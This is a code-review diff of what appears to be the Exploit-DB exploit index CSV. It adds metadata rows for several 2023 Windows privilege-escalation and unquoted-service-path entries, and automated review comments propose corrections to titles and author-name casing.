38323,exploits/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5074;OSVDB-128086,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5074/ 38323,exploits/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5074;OSVDB-128086,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5074/
38321,exploits/php/webapps/38321.txt,"X2Engine 4.2 - Cross-Site Request Forgery",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5075;OSVDB-128085,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5075/ 38321,exploits/php/webapps/38321.txt,"X2Engine 4.2 - Cross-Site Request Forgery",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5075;OSVDB-128085,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5075/
1738,exploits/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Remote Command Execution",2006-05-02,rgod,webapps,php,,2006-05-01,2016-12-23,1,OSVDB-25149;CVE-2006-2156,,,,http://www.exploit-db.comx7chat2_0_0.zip, 1738,exploits/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Remote Command Execution",2006-05-02,rgod,webapps,php,,2006-05-01,2016-12-23,1,OSVDB-25149;CVE-2006-2156,,,,http://www.exploit-db.comx7chat2_0_0.zip,
@ -37201,6 +37225,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328 42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,, 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,,
42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161 42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161
51348,exploits/windows/dos/51348.txt,"Microsoft Windows 11 - 'cmd.exe' Denial of Service",2023-04-08,"Milad karimi",dos,windows,,2023-04-08,2023-04-08,0,,,,,,
20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info 20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info
20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info 20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info 20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
@ -38925,6 +38950,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14959,exploits/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",local,windows,,2010-09-09,2010-09-10,1,,,,http://www.exploit-db.com/screenshots/idlt15000/14959.png,http://www.exploit-db.comAcoustica-MP3-Audio-Mixer-Installer.exe, 14959,exploits/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",local,windows,,2010-09-09,2010-09-10,1,,,,http://www.exploit-db.com/screenshots/idlt15000/14959.png,http://www.exploit-db.comAcoustica-MP3-Audio-Mixer-Installer.exe,
6329,exploits/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,local,windows,,2008-08-28,,1,CVE-2007-3006;OSVDB-43455,,,,, 6329,exploits/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,local,windows,,2008-08-28,,1,CVE-2007-3006;OSVDB-43455,,,,,
47615,exploits/windows/local/47615.txt,"Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path",2019-11-12,"Alejandra Sánchez",local,windows,,2019-11-12,2019-11-12,0,,,,,, 47615,exploits/windows/local/47615.txt,"Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path",2019-11-12,"Alejandra Sánchez",local,windows,,2019-11-12,2019-11-12,0,,,,,,
51332,exploits/windows/local/51332.txt,"ActFax 10.10 - Unquoted Path Services",2023-04-08,"Birkan ALHAN",local,windows,,2023-04-08,2023-04-08,0,,,,,,
20915,exploits/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation",2012-08-29,"Craig Freyman",local,windows,,2012-08-29,2012-08-29,1,OSVDB-85175,,,http://www.exploit-db.com/screenshots/idlt21000/screen-shot-2012-08-29-at-50812-pm.png,http://www.exploit-db.comactfax_setup_en.exe, 20915,exploits/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation",2012-08-29,"Craig Freyman",local,windows,,2012-08-29,2012-08-29,1,OSVDB-85175,,,http://www.exploit-db.com/screenshots/idlt21000/screen-shot-2012-08-29-at-50812-pm.png,http://www.exploit-db.comactfax_setup_en.exe,
50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",2021-09-13,"Salman Asad",local,windows,,2021-09-13,2022-08-01,1,,,,,, 50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",2021-09-13,"Salman Asad",local,windows,,2021-09-13,2022-08-01,1,,,,,,
21139,exploits/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,local,windows,,2012-09-08,2012-09-08,1,OSVDB-85175,"Metasploit Framework (MSF)",,,, 21139,exploits/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,local,windows,,2012-09-08,2012-09-08,1,OSVDB-85175,"Metasploit Framework (MSF)",,,,
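Review bot: The description on the added row 51332 reads "Unquoted Path Services", while the neighbouring rows for the same bug class (47615, 50273) use "Unquoted Service Path", so a search or filter on the usual phrase will miss this entry. Suggest "ActFax 10.10 - Unquoted Service Path" and, if the advisory names the affected service, quoting it in the title the way 47615 does with 'afcdpsrv'.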
@ -39626,6 +39652,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,,2021-02-09,2021-02-17,0,,,,,, 49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,,2021-02-09,2021-02-17,0,,,,,,
25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows,,2013-05-14,2013-05-14,1,CVE-2013-0726;OSVDB-92694,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/51725/ 25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows,,2013-05-14,2013-05-14,1,CVE-2013-0726;OSVDB-92694,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/51725/
26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows,,2013-07-09,2013-07-09,1,CVE-2013-3482;OSVDB-93650,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/53620/ 26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows,,2013-07-09,2013-07-09,1,CVE-2013-3482;OSVDB-93650,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/53620/
51351,exploits/windows/local/51351.txt,"ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path",2023-04-08,"Milad karimi",local,windows,,2023-04-08,2023-04-08,0,,,,,,
7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,,2008-12-17,,1,CVE-2008-5724;OSVDB-50942,,2008-Epfw_Exp.zip,,, 7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,,2008-12-17,,1,CVE-2008-5724;OSVDB-50942,,2008-Epfw_Exp.zip,,,
17880,exploits/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,local,windows,,2011-09-21,2011-09-21,1,CVE-2011-3494;OSVDB-75456,"Metasploit Framework (MSF)",,,, 17880,exploits/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,local,windows,,2011-09-21,2011-09-21,1,CVE-2011-3494;OSVDB-75456,"Metasploit Framework (MSF)",,,,
19138,exploits/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",local,windows,,2012-06-14,2012-06-14,0,OSVDB-82986;CVE-2012-1661,,,,, 19138,exploits/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",local,windows,,2012-06-14,2012-06-14,0,OSVDB-82986;CVE-2012-1661,,,,,
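Review bot: In the added row 51351 the quoted token is 'Service ekrn' and the product is given as "ESET Service", so the quoted part is not a bare service name as it is in 49548 ('EMP_UDSA') in this same hunk. Suggest quoting only the service name, 'ekrn', and replacing "ESET Service" with the product that version 16.0.26.0 belongs to if the advisory states it.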
@ -40987,6 +41014,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14768,exploits/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67496;CVE-2010-5236,,,,, 14768,exploits/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67496;CVE-2010-5236,,,,,
14781,exploits/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67583;CVE-2010-5195,,,,, 14781,exploits/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67583;CVE-2010-5195,,,,,
14752,exploits/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,0,OSVDB-67567,,,,, 14752,exploits/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,0,OSVDB-67567,,,,,
51336,exploits/windows/local/51336.txt,"RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution",2023-04-08,hyp3rlinx,local,windows,,2023-04-08,2023-04-08,0,CVE-2022-47529,,,,,
44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,,2018-06-13,2018-06-13,0,CVE-2018-10619,,,,, 44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,,2018-06-13,2018-06-13,0,CVE-2018-10619,,,,,
47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,, 47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,,
48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,,2020-04-20,2020-04-20,0,,,,,, 48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,,2020-04-20,2020-04-20,0,,,,,,
@ -41103,6 +41131,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,,2019-08-13,2019-08-13,0,,,,,,https://github.com/AbsoZed/SteamPrivEsc/blob/d51c5bc73c3db87bcdb6bb8e3480483ebb28e8d4/SteamPwn.ps1 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,,2019-08-13,2019-08-13,0,,,,,,https://github.com/AbsoZed/SteamPrivEsc/blob/d51c5bc73c3db87bcdb6bb8e3480483ebb28e8d4/SteamPwn.ps1
16633,exploits/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,OSVDB-64580,"Metasploit Framework (MSF)",,,, 16633,exploits/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,OSVDB-64580,"Metasploit Framework (MSF)",,,,
30032,exploits/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Local Buffer Overflow (SEH) (DEP Bypass + ROP)",2013-12-04,metacom,local,windows,,2013-12-06,2016-09-04,1,CVE-2013-7186;OSVDB-101253,,,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-06-at-113504.png,, 30032,exploits/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Local Buffer Overflow (SEH) (DEP Bypass + ROP)",2013-12-04,metacom,local,windows,,2013-12-06,2016-09-04,1,CVE-2013-7186;OSVDB-101253,,,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-06-at-113504.png,,
51341,exploits/windows/local/51341.txt,"Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation",2023-04-08,"TOUHAMI Kasbaoui",local,windows,,2023-04-08,2023-04-08,0,,,,,,
45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)",2018-09-13,"Parvez Anwar",local,windows,,2018-09-13,2019-02-13,1,,Local,,,http://www.exploit-db.comSTOPzillaAntiMalware.msi, 45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)",2018-09-13,"Parvez Anwar",local,windows,,2018-09-13,2019-02-13,1,,Local,,,http://www.exploit-db.comSTOPzillaAntiMalware.msi,
45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2018-09-15,"Ivan Ivanovic",local,windows,,2019-03-04,2019-03-11,0,,,,,, 45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2018-09-15,"Ivan Ivanovic",local,windows,,2019-03-04,2019-03-11,0,,,,,,
18186,exploits/windows/local/18186.rb,"StoryBoard Quick 6 - Local Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",local,windows,,2011-12-01,2011-12-01,0,OSVDB-77421;CVE-2011-5172,"Metasploit Framework (MSF)",,,,http://security-assessment.com/files/documents/advisory/StoryBoard_Quick_6-Stack_Buffer_Overflow.pdf 18186,exploits/windows/local/18186.rb,"StoryBoard Quick 6 - Local Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",local,windows,,2011-12-01,2011-12-01,0,OSVDB-77421;CVE-2011-5172,"Metasploit Framework (MSF)",,,,http://security-assessment.com/files/documents/advisory/StoryBoard_Quick_6-Stack_Buffer_Overflow.pdf
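Review bot: The author field on the added row 51341 is "TOUHAMI Kasbaoui", with the first token in capitals, whereas the surrounding rows use ordinary capitalisation ("Parvez Anwar", "Ivan Ivanovic"). If this column is matched as a plain string to group an author's entries, one spelling per author should be kept; suggest normalising the casing unless earlier rows by the same author already use this form.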

Can't render this file because it is too large.